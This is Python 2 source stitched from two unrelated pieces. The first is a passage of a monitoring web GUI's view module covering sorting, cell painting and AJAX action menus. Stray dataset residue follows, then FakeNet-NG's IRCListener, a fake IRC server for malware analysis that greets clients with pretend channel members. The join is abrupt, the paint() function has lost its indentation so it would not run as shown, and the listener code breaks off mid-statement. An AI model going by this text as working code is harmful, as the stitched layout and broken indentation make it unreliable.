    for nr, row in enumerate(action_rows):
        core_commands, title, executor = core_command(what, row, nr, len(action_rows))
        for command_entry in core_commands:
            site = row.get("site") # site is missing for BI rows (aggregations can spawn several sites)
            if (site, command_entry) not in already_executed:
                # Some command functions return the information about the site per-command (e.g. for BI)
                if type(command_entry) == tuple:
                    site, command = command_entry
                else:
                    command = command_entry

                if type(command) == unicode:
                    command = command.encode("utf-8")

                executor(command, site)
                already_executed.add((site, command_entry))
                count += 1

    message = None
    if command:
        message = _("Successfully sent %d commands.") % count
        if config.debug:
            message += _("The last one was: <pre>%s</pre>") % command
    elif count == 0:
        message = _("No matching data row. No command sent.")

    if message:
        if html.output_format == "html": # sorry for this hack
            message += '<br><a href="%s">%s</a>' % (backurl, _('Back to view'))
            if html.var("show_checkboxes") == "1":
                html.del_var("selection")
                weblib.selection_id()
                backurl += "&selection=" + html.var("selection")
                message += '<br><a href="%s">%s</a>' % (backurl, _('Back to view with checkboxes reset'))
            if html.var("_show_result") == "0":
                html.immediate_browser_redirect(0.5, backurl)
        html.message(message)

    return True
def filter_by_row_id(view, rows):
    """Return the (at most one) row whose stable row id matches the
    _row_id request variable; [] when no row matches."""
    wanted = html.var("_row_id")
    matches = [ row for row in rows if row_id(view, row) == wanted ]
    return matches[:1]
def filter_selected_rows(view, rows, selected_ids):
    """Return only those rows whose stable row id is in selected_ids."""
    return [ row for row in rows if row_id(view, row) in selected_ids ]
def get_context_link(user, viewname):
    """Return the URL of the named view if it is available, else None."""
    if viewname not in available_views:
        return None
    return "view.py?view_name=%s" % viewname
def ajax_export():
    """AJAX endpoint: dump all available views as a pprint'ed dict.

    NOTE: mutates the loaded view dicts in place (owner cleared, public
    forced to True) before printing them.
    """
    load_views()
    for name, view in available_views.items():
        view["owner"] = ''
        view["public"] = True
    html.write(pprint.pformat(available_views))
def get_view_by_name(view_name):
    """Return the view definition with the given name.

    Raises KeyError when no such view is available to the current user.
    """
    load_views()
    return available_views[view_name]
#.
# .--Plugin Helpers------------------------------------------------------.
# | ____ _ _ _ _ _ |
# | | _ \| |_ _ __ _(_)_ __ | | | | ___| |_ __ ___ _ __ ___ |
# | | |_) | | | | |/ _` | | '_ \ | |_| |/ _ \ | '_ \ / _ \ '__/ __| |
# | | __/| | |_| | (_| | | | | | | _ | __/ | |_) | __/ | \__ \ |
# | |_| |_|\__,_|\__, |_|_| |_| |_| |_|\___|_| .__/ \___|_| |___/ |
# | |___/ |_| |
# +----------------------------------------------------------------------+
# | |
# '----------------------------------------------------------------------'
def register_hook(hook, func):
    """Register *func* to be executed for *hook*; duplicates are ignored."""
    funcs = view_hooks.setdefault(hook, [])
    if func not in funcs:
        funcs.append(func)
def execute_hooks(hook):
    """Run all functions registered for *hook*.

    In debug mode a failing hook raises MKGeneralException with the
    traceback; otherwise errors are deliberately swallowed so a broken
    plugin cannot break page rendering.
    """
    for hook_func in view_hooks.get(hook, []):
        try:
            hook_func()
        except:
            if config.debug:
                raise MKGeneralException(_('Problem while executing hook function %s in hook %s: %s')
                                           % (hook_func.__name__, hook, traceback.format_exc()))
            else:
                pass
def paint(p, row, tdattrs="", is_last_painter=False):
tdclass, content = prepare_paint(p, row)
if is_last_painter:
if tdclass == None:
tdclass = "last_col"
else:
tdclass += " last_col"
if tdclass:
html.write("<td %s class=\"%s\">%s</td>\n" % (tdattrs, tdclass, content))
else:
html.write("<td %s>%s</td>" % (tdattrs, content))
html.guitest_record_output("view", ("cell", content))
return content != ""
def paint_painter(painter, row):
    """Invoke the painter's paint function on *row*.

    Returns the (css_class, content) pair produced by the painter. For
    join columns *row* may be empty/None, yielding an empty cell.
    """
    if not row:
        return "", "" # no join information available for that column
    paint_func = painter["paint"]
    if "args" in painter:
        return paint_func(row, *painter["args"])
    return paint_func(row)
def join_row(row, p):
    """Return the joined sub-row for a join-column painter spec (p[3] is
    the join key), or *row* unchanged for normal painters."""
    if len(p) >= 4 and p[3]:
        return row.get("JOIN", {}).get(p[3])
    return row
def prepare_paint(p, row):
    """Compute the (css_class, html_content) of one cell.

    Resolves the joined sub-row, HTML-escapes the painter output and
    optionally wraps it into a link to another view and/or a tooltip.
    """
    painter = p[0]
    linkview = p[1]
    tooltip = len(p) > 2 and p[2] or None
    row = join_row(row, p)

    tdclass, content = paint_painter(painter, row)
    if tdclass == None:
        tdclass = ""

    if tdclass == "" and content == "":
        return tdclass, content

    content = html.utf8_to_entities(content)

    # Create contextlink to other view
    if content and linkview:
        content = link_to_view(content, row, linkview)

    # Tooltip: render the tooltip painter and use its stripped text
    if content != '' and tooltip:
        cla, txt = multisite_painters[tooltip]["paint"](row)
        tooltiptext = html.utf8_to_entities(html.strip_tags(txt))
        content = '<span title="%s">%s</span>' % (tooltiptext, content)
    return tdclass, content
def url_to_view(row, view_name):
    """Compute the URL linking from *row* to view *view_name*, carrying
    over all context filter variables derivable from the row.

    Returns None when linking is disabled ('I' not in display options)
    or the target view is unknown/not permitted.
    """
    if 'I' not in html.display_options:
        return None

    view = permitted_views().get(view_name)
    if view:
        # Get the context type of the view to link to, then get the parameters of this
        # context type and try to construct the context from the data of the row
        url_vars = []
        datasource = multisite_datasources[view['datasource']]
        for info_key in datasource['infos']:
            if info_key in view['single_infos']:
                # Determine which filters (their names) need to be set
                # for specifying in order to select correct context for the
                # target view.
                for filter_name in visuals.info_params(info_key):
                    filter_object = visuals.get_filter(filter_name)
                    # Get the list of URI vars to be set for that filter
                    new_vars = filter_object.variable_settings(row)
                    url_vars += new_vars

        # See get_link_filter_names() comment for details
        for src_key, dst_key in visuals.get_link_filter_names(view, datasource['infos'],
                                                datasource.get('link_filters', {})):
            url_vars += visuals.get_filter(src_key).variable_settings(row)
            url_vars += visuals.get_filter(dst_key).variable_settings(row)

        # Some special handling for the site filter which is meant as optional hint
        # Always add the site filter var when some useful information is available
        add_site_hint = True
        for filter_key in datasource.get('multiple_site_filters', []):
            if filter_key in dict(url_vars):
                add_site_hint = False

        if add_site_hint and row.get('site'):
            url_vars.append(('site', row['site']))

        do = html.var("display_options")
        if do:
            url_vars.append(("display_options", do))

        filename = html.mobile and "mobile_view.py" or "view.py"
        return filename + "?" + html.urlencode_vars([("view_name", view_name)] + url_vars)
def link_to_view(content, row, view_name):
    """Wrap *content* in an HTML link to view_name if linking is enabled
    and an URL can be computed; otherwise return it unchanged."""
    if 'I' not in html.display_options:
        return content

    url = url_to_view(row, view_name)
    if not url:
        return content
    return "<a href=\"%s\">%s</a>" % (url, content)
def docu_link(topic, text):
    """Return an HTML link into the online documentation for *topic*."""
    url = config.doculink_urlformat % topic
    return '<a href="%s" target="_blank">%s</a>' % (url, text)
# Calculates a uniq id for each data row which identifies the current
# row accross different page loadings.
def row_id(view, row):
    """Return a stable identifier of *row*, built from the datasource's
    idkey columns, that survives page reloads."""
    parts = [ '~%s' % row[col]
              for col in multisite_datasources[view['datasource']]['idkeys'] ]
    return str(hash(''.join(parts)))
def paint_stalified(row, text):
    """Return painter output with the "stale" CSS class for stale rows."""
    css = "stale" if is_stale(row) else ""
    return css, text
def substract_sorters(base, remove):
    """Remove every sorter in *remove* from *base*, in place.

    A sorter matches regardless of sort direction: (name, False) also
    removes (name, True) and vice versa.
    """
    for sorter in remove:
        flipped = (sorter[0], not sorter[1])
        if sorter in base:
            base.remove(sorter)
        elif flipped in base:
            base.remove(flipped)
def parse_url_sorters(sort):
    """Parse the "sort" URL parameter into a list of sorter tuples.

    Each comma separated entry yields (name, reverse) or, for join
    columns written as "name~joinkey", (name, reverse, joinkey).
    A leading "-" means descending order.
    """
    if not sort:
        return []

    sorters = []
    for entry in sort.split(','):
        if '~' in entry:
            name, join_index = entry.split('~', 1)
            sorters.append((name.replace('-', ''), name.startswith('-'), join_index))
        else:
            sorters.append((entry.replace('-', ''), entry.startswith('-')))
    return sorters
def get_sorter_name_of_painter(painter):
    """Return the sorter belonging to *painter*: the explicitly declared
    one, else the sorter with the painter's name, else None."""
    if 'sorter' in painter:
        return painter['sorter']
    if painter['name'] in multisite_sorters:
        return painter['name']
    return None
def get_primary_sorter_order(view, painter):
    """Return 'asc'/'desc' when the user's primary sorter is this
    painter's sorter, otherwise ''. Used for the header sort arrow."""
    sorter_name = get_sorter_name_of_painter(painter)
    user_sort = get_separated_sorters(view)[1]
    if not user_sort:
        return ''
    if user_sort[0] == (sorter_name, False):
        return 'asc'
    if user_sort[0] == (sorter_name, True):
        return 'desc'
    return ''
def get_separated_sorters(view):
    """Split the effective sorters into (group_sort, user_sort, view_sort).

    group_sort: sorters implied by the view's group painters
    user_sort:  sorters from the "sort" URL parameter minus the group ones
    view_sort:  configured view sorters minus group and user sorters
    (the two substract_sorters() calls mutate the lists in place)
    """
    group_sort = [ (get_sorter_name_of_painter(multisite_painters[p[0]]), False)
                   for p in view['group_painters']
                   if p[0] in multisite_painters
                      and get_sorter_name_of_painter(multisite_painters[p[0]]) is not None ]
    view_sort  = [ s for s in view['sorters'] if not s[0] in group_sort ]

    # Get current url individual sorters. Parse the "sort" url parameter,
    # then remove the group sorters. The left sorters must be the user
    # individual sorters for this view.
    # Then remove the user sorters from the view sorters
    user_sort = parse_url_sorters(html.var('sort'))

    substract_sorters(user_sort, group_sort)
    substract_sorters(view_sort, user_sort)

    return group_sort, user_sort, view_sort
def sort_url(view, painter, join_index):
    """Compute the new value of the "sort" URL parameter after a click
    on this column's header.

    The following sorters need to be handled in this order:
    1. group by sorter (needed in grouped views)
    2. user defined sorters (url sorter)
    3. configured view sorters

    Clicking cycles the column through: ascending -> descending -> off.
    """
    sorter = []

    group_sort, user_sort, view_sort = get_separated_sorters(view)

    sorter = group_sort + user_sort + view_sort

    # Now apply the sorter of the current column:
    # - Negate/Disable when at first position
    # - Move to the first position when already in sorters
    # - Add in the front of the user sorters when not set
    sorter_name = get_sorter_name_of_painter(painter)
    if join_index:
        this_asc_sorter = (sorter_name, False, join_index)
        this_desc_sorter = (sorter_name, True, join_index)
    else:
        this_asc_sorter = (sorter_name, False)
        this_desc_sorter = (sorter_name, True)

    if user_sort and this_asc_sorter == user_sort[0]:
        # Second click: Change from asc to desc order
        sorter[sorter.index(this_asc_sorter)] = this_desc_sorter
    elif user_sort and this_desc_sorter == user_sort[0]:
        # Third click: Remove this sorter
        sorter.remove(this_desc_sorter)
    else:
        # First click: add this sorter as primary user sorter
        # Maybe the sorter is already in the user sorters or view sorters, remove it
        for s in [ user_sort, view_sort ]:
            if this_asc_sorter in s:
                s.remove(this_asc_sorter)
            if this_desc_sorter in s:
                s.remove(this_desc_sorter)
        # Now add the sorter as primary user sorter
        sorter = group_sort + [this_asc_sorter] + user_sort + view_sort

    # Encode each sorter as "[-]name" or "[-]name~joinkey"
    p = []
    for s in sorter:
        if len(s) == 2:
            p.append((s[1] and '-' or '') + s[0])
        else:
            p.append((s[1] and '-' or '') + s[0] + '~' + s[2])

    return ','.join(p)
def paint_header(view, p, is_last_column_header=False):
    """Render the <th> header cell of one column, with an optional sort link.

    The painter spec tuple p has the following components:
      p[0] --> painter object, from multisite_painters[]
      p[1] --> view name to link to or None (not needed here)
      p[2] --> tooltip (title) to display (not needed here)
      p[3] --> optional: join key (e.g. service description)
      p[4] --> optional: column title to use instead default
    """
    painter = p[0]
    join_index = None
    t = painter.get("short", painter["title"])
    if len(p) >= 4: # join column
        join_index = p[3]
        t = p[3] # use join index (service name) as title
    if len(p) >= 5 and p[4]:
        t = p[4] # use custom defined title

    # Optional: Sort link in title cell
    # Use explicit defined sorter or implicit the sorter with the painter name
    # Important for links:
    # - Add the display options (Keeping the same display options as current)
    # - Link to _self (Always link to the current frame)
    classes = []
    onclick = ''
    title = ''
    if 'L' in html.display_options \
       and view.get('user_sortable', False) \
       and get_sorter_name_of_painter(painter) is not None:
        params = [
            ('sort', sort_url(view, painter, join_index)),
        ]
        if hasattr(html, 'title_display_options'):
            params.append(('display_options', html.title_display_options))

        classes += [ "sort", get_primary_sorter_order(view, painter) ]
        onclick = ' onclick="location.href=\'%s\'"' % html.makeuri(params, 'sort')
        title = ' title="%s"' % (_('Sort by %s') % t)

    if is_last_column_header:
        classes.append("last_col")

    thclass = classes and (" class=\"%s\"" % " ".join(classes)) or ""

    html.write("<th%s%s%s>%s</th>" % (thclass, onclick, title, t))
    html.guitest_record_output("view", ("header", title))
def register_events(row):
    """Register sound events for the host/service state of *row*.

    Uses the last *hard* state when available, the current state otherwise.
    NOTE(review): service state 0 maps to the event name "up" (not "ok");
    presumably intentional to match the configured sound names - confirm.
    """
    if config.sounds != []:
        host_state = row.get("host_hard_state", row.get("host_state"))
        if host_state != None:
            html.register_event({0:"up", 1:"down", 2:"unreachable"}[saveint(host_state)])
        svc_state = row.get("service_last_hard_state", row.get("service_state"))
        if svc_state != None:
            html.register_event({0:"up", 1:"warning", 2:"critical", 3:"unknown"}[saveint(svc_state)])
# The Group-value of a row is used for deciding wether
# two rows are in the same group or not
def group_value(row, group_painters):
    """Compute a hashable grouping key of *row* for the given group
    painters, used to decide whether two rows share the same group."""
    group = []
    for p in group_painters:
        painter = p[0]
        groupvalfunc = painter.get("groupby")
        if groupvalfunc:
            if "args" in painter:
                group.append(groupvalfunc(row, *painter["args"]))
            else:
                group.append(groupvalfunc(row))
        else:
            # Fall back to the raw values of the painter's columns
            group += [ row[c] for c in get_painter_columns(painter) if c in row ]
    return create_dict_key(group)
def create_dict_key(value):
    """Recursively convert lists/tuples/dicts into nested tuples so the
    value becomes hashable and can serve as a dictionary key."""
    if type(value) in (list, tuple):
        return tuple(create_dict_key(v) for v in value)
    elif type(value) == dict:
        return tuple((k, create_dict_key(v)) for k, v in sorted(value.items()))
    return value
def get_painter_option(name):
    """Return the effective value of a painter option: a forced value if
    declared, the valuespec default when the user may not change display
    options, otherwise the stored value (falling back to the default)."""
    opt = multisite_painter_options[name]
    if "forced_value" in opt:
        return opt["forced_value"]
    if not config.may("general.painter_options"):
        return opt['valuespec'].default_value()
    return opt.get("value", opt['valuespec'].default_value())
def get_host_tags(row):
    """Extract the host's TAGS string from a livestatus row.

    The row may carry the custom variables either as a dict
    (host_custom_variables) or as two parallel name/value lists.
    Returns "" when no tag information is present.
    """
    custom_vars = row.get("host_custom_variables")
    if type(custom_vars) == dict:
        return custom_vars.get("TAGS", "")

    names = row.get("host_custom_variable_names")
    if type(names) != list:
        return ""
    for name, value in zip(names, row["host_custom_variable_values"]):
        if name == "TAGS":
            return value
    return ""
# Get the definition of a tag group
# Module-level cache: tag group id -> (entry[1], entry[2]) of config.wato_host_tags
g_taggroups_by_id = {}
def get_tag_group(tgid):
    """Return the cached definition of the tag group *tgid*, or None.

    NOTE(review): the cached tuple is (entry[1], entry[2]) of the WATO
    host tag entries - presumably (title, choices); confirm against WATO.
    """
    # Build a cache on first use
    if not g_taggroups_by_id:
        for entry in config.wato_host_tags:
            g_taggroups_by_id[entry[0]] = (entry[1], entry[2])

    return g_taggroups_by_id.get(tgid)
def get_custom_var(row, key):
    """Return the value of custom variable *key* from the row's parallel
    name/value lists, or "" when it is not set."""
    pairs = zip(row["custom_variable_names"],
                row["custom_variable_values"])
    for name, value in pairs:
        if name == key:
            return value
    return ""
def is_stale(row):
    """Return True when the row's service (or host) staleness reaches the
    configured staleness threshold."""
    staleness = row.get('service_staleness', row.get('host_staleness', 0))
    return staleness >= config.staleness_threshold
def cmp_insensitive_string(v1, v2):
    """Case-insensitive cmp() of two strings; spellings that differ only
    in case are ordered case-sensitively to keep the order strict."""
    result = cmp(v1.lower(), v2.lower())
    if result != 0:
        return result
    return cmp(v1, v2)
# Sorting
def cmp_ip_address(column, r1, r2):
    """cmp() two rows by the IP address in *column*, octet by octet.

    Non dotted-quad values (hostnames, empty strings) fall back to a
    plain comparison of the raw value.
    """
    def split_ip(ip):
        try:
            return tuple(int(part) for part in ip.split('.'))
        # Narrowed from a bare except: int() raises ValueError for
        # non-numeric parts, split() raises AttributeError for non-strings
        except (ValueError, AttributeError):
            return ip
    v1, v2 = split_ip(r1.get(column, '')), split_ip(r2.get(column, ''))
    return cmp(v1, v2)
def cmp_simple_string(column, r1, r2):
    """cmp() two rows by the string in *column*, case-insensitively."""
    return cmp_insensitive_string(r1.get(column, ''), r2.get(column, ''))
def cmp_num_split(column, r1, r2):
    """cmp() two rows by *column* using natural (numeric-aware) ordering,
    with the raw value appended as tie breaker."""
    v1, v2 = r1[column], r2[column]
    return cmp(num_split(v1) + (v1,), num_split(v2) + (v2,))
def cmp_string_list(column, r1, r2):
    """cmp() two rows by the concatenated string list in *column*."""
    joined1 = ''.join(r1.get(column, []))
    joined2 = ''.join(r2.get(column, []))
    return cmp_insensitive_string(joined1, joined2)
def cmp_simple_number(column, r1, r2):
    """cmp() two rows by the value in *column* (missing values -> None)."""
    v1 = r1.get(column)
    v2 = r2.get(column)
    return cmp(v1, v2)
def cmp_custom_variable(r1, r2, key, cmp_func):
    """Compare two rows by the value of the custom variable *key*.

    NOTE(review): the cmp_func parameter is accepted but never used - the
    values are always compared with plain cmp(). Confirm whether callers
    expect their custom comparison function to be applied here.
    """
    return cmp(get_custom_var(r1, key), get_custom_var(r2, key))
def declare_simple_sorter(name, title, column, func):
    """Register a sorter comparing a single livestatus column via *func*."""
    multisite_sorters[name] = {
        "title" : title,
        "columns" : [ column ],
        "cmp" : lambda r1, r2: func(column, r1, r2)
    }
def declare_1to1_sorter(painter_name, func, col_num = 0, reverse = False):
    """Register a sorter that reuses the title/columns of one painter.

    func(column, r1, r2) compares a single column; col_num selects which
    of the painter's columns, reverse swaps the row arguments. Returns
    painter_name so calls can be chained.
    """
    multisite_sorters[painter_name] = {
        "title" : multisite_painters[painter_name]['title'],
        "columns" : multisite_painters[painter_name]['columns'],
    }
    if not reverse:
        multisite_sorters[painter_name]["cmp"] = \
            lambda r1, r2: func(multisite_painters[painter_name]['columns'][col_num], r1, r2)
    else:
        multisite_sorters[painter_name]["cmp"] = \
            lambda r1, r2: func(multisite_painters[painter_name]['columns'][col_num], r2, r1)
    return painter_name
# Ajax call for fetching parts of the tree
def ajax_inv_render_tree():
    """AJAX endpoint rendering one subtree of a host's inventory tree.

    HTML vars: host, path (inventory path) and optionally treeid - when
    set, a historic delta tree is loaded instead of the current one.
    """
    hostname = html.var("host")
    invpath = html.var("path")
    tree_id = html.var("treeid", "")
    if tree_id:
        # the first character of treeid is a marker; the rest is numeric
        tree = inventory.load_delta_tree(hostname, int(tree_id[1:]))
    else:
        tree = inventory.host(hostname)
    node = inventory.get(tree, invpath)
    if not node:
        html.show_error(_("Invalid path %s in inventory tree") % invpath)
    else:
        render_inv_subtree_container(hostname, tree_id, invpath, node)
def output_csv_headers(view):
    """Send the HTTP header that downloads the view as a timestamped CSV."""
    filename = '%s-%s.csv' % (view['name'], time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime(time.time())))
    # HTTP headers must be byte strings (Python 2 unicode handling).
    if type(filename) == unicode:
        filename = filename.encode("utf-8")
    html.req.headers_out['Content-Disposition'] = 'Attachment; filename=%s' % filename
#.
# .--Icon Selector-------------------------------------------------------.
# | ___ ____ _ _ |
# | |_ _|___ ___ _ __ / ___| ___| | ___ ___| |_ ___ _ __ |
# | | |/ __/ _ \| '_ \ \___ \ / _ \ |/ _ \/ __| __/ _ \| '__| |
# | | | (_| (_) | | | | ___) | __/ | __/ (__| || (_) | | |
# | |___\___\___/|_| |_| |____/ \___|_|\___|\___|\__\___/|_| |
# | |
# +----------------------------------------------------------------------+
# | AJAX API call for rendering the icon selector |
# '----------------------------------------------------------------------'
def ajax_popup_icon_selector():
    """AJAX endpoint rendering the icon selector popup input.

    HTML vars: varprefix, value (currently selected icon) and allow_empty.
    """
    varprefix   = html.var('varprefix')
    value       = html.var('value')
    allow_empty = html.var('allow_empty') == '1'

    vs = IconSelector(allow_empty=allow_empty)
    vs.render_popup_input(varprefix, value)
#.
# .--Action Menu---------------------------------------------------------.
# | _ _ _ __ __ |
# | / \ ___| |_(_) ___ _ __ | \/ | ___ _ __ _ _ |
# | / _ \ / __| __| |/ _ \| '_ \ | |\/| |/ _ \ '_ \| | | | |
# | / ___ \ (__| |_| | (_) | | | | | | | | __/ | | | |_| | |
# | /_/ \_\___|\__|_|\___/|_| |_| |_| |_|\___|_| |_|\__,_| |
# | |
# +----------------------------------------------------------------------+
# | Realizes the popup action menu for hosts/services in views |
# '----------------------------------------------------------------------'
def query_action_data(what, host, site, svcdesc):
    """Fetch one livestatus row with every column the action menu needs.

    what is "host" or "service"; svcdesc is the service description when
    querying a service. Returns a dict column name -> value, including
    the prepended "site" column.
    """
    # Now fetch the needed data from livestatus
    columns = list(iconpainter_columns(what, toplevel=False))
    # "site" is delivered via set_prepend_site() below, so it must not be
    # queried as a regular column. Bugfix: list.remove() raises ValueError
    # (not KeyError) when the element is missing, so the old KeyError
    # handler could never fire.
    try:
        columns.remove('site')
    except ValueError:
        pass

    if site:
        html.live.set_only_sites([site])
    html.live.set_prepend_site(True)
    query = 'GET %ss\n' \
            'Columns: %s\n' \
            'Filter: host_name = %s\n' \
           % (what, ' '.join(columns), host)
    if what == 'service':
        query += 'Filter: service_description = %s\n' % svcdesc
    row = html.live.query_row(query)

    html.live.set_prepend_site(False)
    html.live.set_only_sites(None)

    return dict(zip(['site'] + columns, row))
def ajax_popup_action_menu():
    """AJAX endpoint rendering the action icon popup menu of a host/service.

    HTML vars: site, host and optionally service - its presence decides
    whether host or service icons are rendered.
    """
    site = html.var('site')
    host = html.var('host')
    svcdesc = html.var('service')
    what = svcdesc and 'service' or 'host'
    prepare_display_options()
    row = query_action_data(what, host, site, svcdesc)
    icons = get_icons(what, row, toplevel=False)
    html.write('<ul>\n')
    for icon in icons:
        html.write('<li>\n')
        # 4-tuple icons carry (toplevel-flag, icon name, title, url spec);
        # anything else is pre-rendered HTML in icon[1].
        if len(icon) == 4:
            icon_name, title, url_spec = icon[1:]
            if url_spec:
                url, target_frame = sanitize_action_url(url_spec)
                url = replace_action_url_macros(url, what, row)
                onclick = ''
                # "onclick:" URLs become inline javascript handlers.
                if url.startswith('onclick:'):
                    onclick = ' onclick="%s"' % url[8:]
                    url = 'javascript:void(0)'
                target = ""
                if target_frame and target_frame != "_self":
                    target = " target=\"%s\"" % target_frame
                html.write('<a href="%s"%s%s>' % (url, target, onclick))
            html.icon('', icon_name)
            if title:
                html.write(title)
            else:
                html.write(_("No title"))
            if url_spec:
                html.write('</a>')
        else:
            html.write(icon[1])
        html.write('</li>\n')
    html.write('</ul>\n')
def sanitize_action_url(url_spec):
    """Normalize an action url spec to a (url, target_frame) pair."""
    is_pair = type(url_spec) == tuple
    return url_spec if is_pair else (url_spec, None)
| 1.453125 | 1 |
fakenet/listeners/IRCListener.py | kak-bo-che/flare-fakenet-ng | 1 | 12766393 | <reponame>kak-bo-che/flare-fakenet-ng
import logging
import sys
import os
import threading
import SocketServer
import ssl
import socket
import BannerFactory
from . import *
# Numeric reply code for the initial server welcome (RPL_WELCOME).
RPL_WELCOME = '001'
SRV_WELCOME = "Welcome to FakeNet."
# Banner templates selectable via the listener configuration; the
# {servername}/{tz} placeholders and strftime fields are expanded elsewhere
# (via genBanner/BannerFactory below).
BANNERS = {
    'generic': 'Welcome to IRC - {servername} - %a %b %d %H:%M:%S {tz} %Y',
    'debian-ircd-irc2': (
        '17/10/2011 11:50\n' +
        ' [ Debian GNU/Linux ]\n' +
        '|------------------------------------------------------------------------|\n' +
        '| This is Debian\'s default IRCd server configuration for irc2.11. If you |\n' +
        '| see this and if you are the server administrator, just edit ircd.conf |\n' +
        '| and ircd.motd in /etc/ircd. |\n' +
        '| <NAME>, 1st January 2005 |\n' +
        '|------------------------------------------------------------------------|\n')
}
class IRCListener(object):
    """FakeNet-NG listener emulating a minimal IRC server."""

    def taste(self, data, dport):
        """Return a confidence score that (data, dport) is IRC traffic.

        +1 when dport is a well-known IRC port, +2 for each known IRC
        command name the (prefix-stripped) payload starts with.
        """
        # All possible commands are included to account for unanticipated
        # malware behavior
        commands = [
            'ADMIN', 'AWAY', 'CAP', 'CNOTICE', 'CPRIVMSG', 'CONNECT', 'DIE',
            'ENCAP', 'ERROR', 'HELP', 'INFO', 'INVITE', 'ISON', 'JOIN', 'KICK',
            'KILL', 'KNOCK', 'LINKS', 'LIST', 'LUSERS', 'MODE', 'MOTD',
            'NAMES', 'NAMESX', 'NICK', 'NOTICE', 'OPER', 'PART', 'PASS',
            'PING', 'PONG', 'PRIVMSG', 'QUIT', 'REHASH', 'RESTART', 'RULES',
            'SERVER', 'SERVICE', 'SERVLIST', 'SQUERY', 'SQUIT', 'SETNAME',
            'SILENCE', 'STATS', 'SUMMON', 'TIME', 'TOPIC', 'TRACE', 'UHNAMES',
            'USER', 'USERHOST', 'USERIP', 'USERS', 'VERSION', 'WALLOPS',
            'WATCH', 'WHO', 'WHOIS', 'WHOWAS'
        ]

        # ubuntu xchat uses 8001
        # Bugfix: the port list previously contained the range object itself
        # as one element, so ports 6660-7000 never matched the membership
        # test. Flatten it into individual port numbers.
        ports = [194, 6667, 8001] + list(range(6660, 7001))

        confidence = 1 if dport in ports else 0

        data = data.lstrip()

        # remove optional prefix
        if data.startswith(':'):
            data = data.split(' ')[0]

        for command in commands:
            if data.startswith(command):
                # NOTE(review): deliberately keeps scanning, so overlapping
                # names (e.g. USER/USERHOST) each add 2 - confirm intended.
                confidence += 2
                continue

        return confidence

    def __init__(self,
            config,
            name='IRCListener',
            logging_level=logging.INFO,
            ):
        """Store configuration and set up logging; call start() to listen."""
        self.logger = logging.getLogger(name)
        self.logger.setLevel(logging_level)

        self.config = config
        self.name = name
        self.local_ip = '0.0.0.0'
        self.server = None
        self.name = 'IRC'
        self.port = self.config.get('port', 6667)

        self.logger.debug('PORT: %s', self.port)

        self.logger.info('Starting...')
        self.logger.debug('Initialized with config:')
        for key, value in config.iteritems():
            self.logger.debug(' %10s: %s', key, value)

    def start(self):
        """Bind the threaded TCP server and serve on a daemon thread."""
        self.logger.debug('Starting...')
        self.server = ThreadedTCPServer((self.local_ip, int(self.config['port'])), ThreadedTCPRequestHandler)
        self.banner = self.genBanner()

        # Hand the handler threads everything they need via the server object.
        self.server.listener = self
        self.server.logger = self.logger
        self.server.config = self.config
        self.server.servername = self.config.get('servername', 'localhost')

        self.server_thread = threading.Thread(target=self.server.serve_forever)
        self.server_thread.daemon = True
        self.server_thread.start()

    def stop(self):
        """Shut down the serve loop and close the listening socket."""
        self.logger.info('Stopping...')
        if self.server:
            self.server.shutdown()
            self.server.server_close()

    def genBanner(self):
        """Render the configured welcome banner via BannerFactory."""
        bannerfactory = BannerFactory.BannerFactory()
        return bannerfactory.genBanner(self.config, BANNERS)
class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
    """Per-connection handler implementing a small subset of IRC.

    Incoming lines are dispatched dynamically to irc_<COMMAND> methods;
    unknown commands fall back to irc_DEFAULT. (Python 2 module: note the
    old-style except syntax below.)
    """

    def handle(self):
        # Timeout connection to prevent hanging
        self.request.settimeout(int(self.server.config.get('timeout', 10)))
        self.server.logger.info('Client connected')
        try:
            while True:
                data = self.request.recv(1024)
                if not data:
                    break
                elif len(data) > 0:
                    # Split the buffer into lines and dispatch each
                    # "COMMAND params" pair to its irc_* handler.
                    for line in data.split("\n"):
                        if line and len(line) > 0:
                            if ' ' in line:
                                cmd, params = line.split(' ', 1)
                            else:
                                cmd, params = line, ''
                            handler = getattr(self, 'irc_%s' % (cmd.upper()), self.irc_DEFAULT)
                            handler(cmd, params)
        except socket.timeout:
            self.server.logger.warning('Connection timeout')
        except socket.error as msg:
            self.server.logger.error('Error: %s', msg.strerror or msg)
        except Exception, e:
            self.server.logger.error('Error: %s', e)

    def irc_DEFAULT(self, cmd, params):
        # Unknown command: reply with numeric 421 like a real server.
        self.server.logger.info('Client issued an unknown command %s %s', cmd, params)
        self.irc_send_server("421", "%s :Unknown command" % cmd)

    def irc_NICK(self, cmd, params):
        # Register the nick and greet with the banner (001) + end of MOTD (376).
        self.nick = params
        banner = self.server.listener.banner
        self.irc_send_server("001", "%s :%s" % (self.nick, banner))
        self.irc_send_server("376", "%s :End of /MOTD command." % self.nick)

    def irc_USER(self, cmd, params):
        # USER <user> <mode> <unused> <realname>
        if params.count(' ') == 3:
            user, mode, unused, realname = params.split(' ', 3)
            self.user = user
            self.mode = mode
            self.realname = realname
            self.request.sendall('')

    def irc_PING(self, cmd, params):
        self.request.sendall(":%s PONG :%s" % (self.server.servername, self.server.servername))

    def irc_JOIN(self, cmd, params):
        # JOIN <channels>[ <keys>]: acknowledge membership, fake a NAMES
        # list and greet the client in every joined channel.
        if ' ' in params:
            channel_names, channel_keys = params.split(' ')
        else:
            channel_names = params
            channel_keys = None
        for i, channel_name in enumerate(channel_names.split(',')):
            if channel_keys:
                self.server.logger.info('Client %s is joining channel %s with key %s', self.nick, channel_name, channel_keys.split(',')[i])
            else:
                self.server.logger.info('Client %s is joining channel %s with no key', self.nick, channel_name)
            self.request.sendall(":root TOPIC %s :FakeNet\r\n" % channel_name)
            self.irc_send_client("JOIN :%s" % channel_name)
            nicks = ['botmaster', 'bot', 'admin', 'root', 'master']
            self.irc_send_server("353", "%s = %s :%s" % (self.nick, channel_name, ' '.join(nicks)))
            self.irc_send_server("366", "%s %s :End of /NAMES list" % (self.nick, channel_name))
            # Send a welcome message
            self.irc_send_client_custom('botmaster', 'botmaster', self.server.servername, "PRIVMSG %s %s" % (channel_name, "Welcome to the channel! %s" % self.nick))

    def irc_PRIVMSG(self, cmd, params):
        # Echo messages back so a conversation appears to take place.
        if ' ' in params:
            target, message = params.split(' ', 1)
            self.server.logger.info('Client sent message "%s" to %s', message, target)
            # Echo the message in the channel back to the user
            if target[0] in ['#', '$']:
